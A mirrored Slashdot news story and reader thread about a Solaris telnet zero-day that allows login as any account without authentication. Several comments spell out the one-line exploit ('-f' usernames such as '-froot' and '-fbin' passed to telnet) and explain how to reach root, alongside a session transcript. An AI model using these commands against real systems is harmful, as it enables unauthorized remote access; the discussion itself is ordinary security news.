Slashdot Mirror

← Back to Stories (view on slashdot.org)

Solaris Telnet 0-day vulnerability

Posted by Hemos on from the frantically-trying-to-fix dept.

philos writes "According to SANS ISC, there's a vulnerability in Solaris 10 and 11 telnet that allows anyone to remotely connect as any account, including root, without authentication. Remote access can be gained with nothing more than a telnet client. More information and a Snort signature can be found at riosec.com. Worse, this is almost identical to a bug in AIX and Linux rlogin from way back in 1994."

17 of 342 comments (clear)

  1. Re:Why is this a big deal? by drsmithy · · Score: 3, Informative

    Who the hell even THINKS about enabling telnet on any box these days?

    Sun, apparently, since it's enabled by default.

  2. Re:Here come the fanboys by SatanicPuppy · · Score: 4, Informative

    Just because it's not deployed in many places, doesn't mean that those places aren't cracker dream targets...I've got 5 Solaris machines, and the least critical of them is a far better target than the most critical Windows, or even Linux box.

    Still, first poster is right. Wtf uses telnet anymore, unless they're dealing with the most legacy of legacy crap.

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
  3. Re:Telnet? by Anonymous Coward · · Score: 3, Informative

    Solaris 8, 9, 10 -- all have telnet, ftp, rlogin and others enabled by default at a clean install.
    You can check it for yourself in vmware, if you do not believe.

  4. Re:Why is this a big deal? by Nasarius · · Score: 3, Informative

    Quicker than SSH? What the hell? Are you streaming video over your SSH connection or what?
    I think GP is referring to the initial connect handshake. Oh no, it takes an extra 500ms to establish a secure connection. If your network is private enough to feel safe using telnet, you can certainly set up RSA/DSA keys to use SSH without a password, eliminating the time it takes to enter it.
    --
    LOAD "SIG",8,1
  5. Re:Configuration issue by walt-sjc · · Score: 4, Informative

    Since apparently Sun is negligent enough to have telnet enabled by default, it is an important story. This reminds me of the old NT4 days, where every service on the machine was enabled by default, and the first thing you had to do was turn everything off. Come on Sun, get with program here...

  6. Re:0-day? by walt-sjc · · Score: 4, Informative

    No, zero day means that an exploit was released before or on the same day as the vendor / community found out about it. Ethical security researchers notify the vendor first, and at LEAST give them a few days / weeks to resolve the problem before releasing the full details to the public.

  7. Re:Why is this a big deal? by dknj · · Score: 5, Informative

    except it's not... (at least not as of the 10/06 release)

  8. Re:Here come the fanboys by SatanicPuppy · · Score: 5, Informative

    Sure, but that's not what's being discussed. There is a world of difference between using telnet to fake some other non-encrypted protocol, and leaving the telnet service enabled on your machine.

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
  9. The Exploit by biftek · · Score: 3, Informative

    Since noone seems to have bothered posting it yet, "telnet -l -frandomuser randomsolarishost".

    So stupid.

  10. Re:Configuration issue by zdzichu · · Score: 4, Informative

    The article talks about Solaris 10 u1 released in 2005. The latest thing is u3, which has two things:

    1) this attack does not work:

    Escape character is '^]'.
    Not on system console
    Connection closed by foreign host.

    2) when installing U3 one can opt to close most services. This could be also done after installation with "netservices limited" command.

    --
    :wq
  11. Didn't work on Solaris 10 01/06 by jaymzter · · Score: 4, Informative

    rhlinux1:~$ telnet -l"-froot" solaris
    Trying 172.16.141.27...
    Connected to solaris.example.com (172.16.141.27).
    Escape character is '^]'.
    Not on system console
    Connection closed by foreign host
    This is basically a vanilla install.
    --
    If thou see a fair woman pay court to her, for thus thou wilt obtain love
    1. Re:Didn't work on Solaris 10 01/06 by Anonymous Coward · · Score: 3, Informative

      telnet -l"-fbin" solaris

  12. Re:Why is this a big deal? by 99BottlesOfBeerInMyF · · Score: 5, Informative

    Who the hell even THINKS about enabling telnet on any box these days?

    Sadly, a whole lot of people. I work for a company that makes very expensive and cool specialty servers that perform certain security related functions. As a security company, naturally we take care not to tarnish our reputation by leaving these servers vulnerable themselves. We try to encourage our customers to be moderately responsible as well, as any box can be made insecure. I know of at least on tier-1 ISP that has one of our boxes sitting publicly accessible with telnet enabled and no IP access restrictions.

    As for who uses telnet in general, most ISPs in Asia seem to use telnet to configure their systems via their control networks. Large financial institutions in Europe use telnet, as use of encryption is restricted on their trusted networks, for reasons of transparency to the stock regulating authorities. ISPs in South America often use telnet and provide shell accounts to customers. I'm sure there are more groups that use it for one reason or another.

  13. Re:Why is this a big deal? by jaymzter · · Score: 3, Informative

    I have 11/06, and believe me, I was surprised to find telnet enabled.

    --
    If thou see a fair woman pay court to her, for thus thou wilt obtain love
  14. Re:Why is this a big deal? by arth1 · · Score: 3, Informative

    Since the exploit site didn't yet have information about older versions of Solaris/SunOS, I hope it can quench the panic for some when I say that only Solaris 10+ appears to be affected.

    If you're on Solaris 8 (SunOS 5.8 or Solaris 2.5.8) or 9 (SunOS 5.9, or Solaris 2.5.9), you appear to be safe.

    This is relevant because large companies seldom jump to the newer versions until they have to - for production systems, as long as the older versions are supported and working, that's more important than gambling on existing software still working if upgrading the OS. So there's an awful lot of systems with Solaris 8 and 9 out there, but luckily they appear not to be affected.

  15. Re:Configuration issue by moyix · · Score: 3, Informative

    This is only because root is not allowed to log in remotely by default. "-fanyotheruser" will still work. I believe the current favorite is "-fbin". Also, if you've commented out the console line in /etc/default/login, it will allow access to root.

    This has been confirmed on the latest version of Solaris 10.

  16. Re:Why is this a big deal? by evilviper · · Score: 3, Informative

    Just because the login is "safe" doesn't mean that using an unencrypted protocol is ever a good idea.

    You're right... No more secure websites for you, since HTTPS is just HTTP over an SSL data stream.

    You could just as easily use Kerberos to encrypt HTTP traffic as SSL, and that is indeed exactly what Kerberos does for just about any communications protocol...

    Kerberos telnet is as encrypted as it gets.
    --
    Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant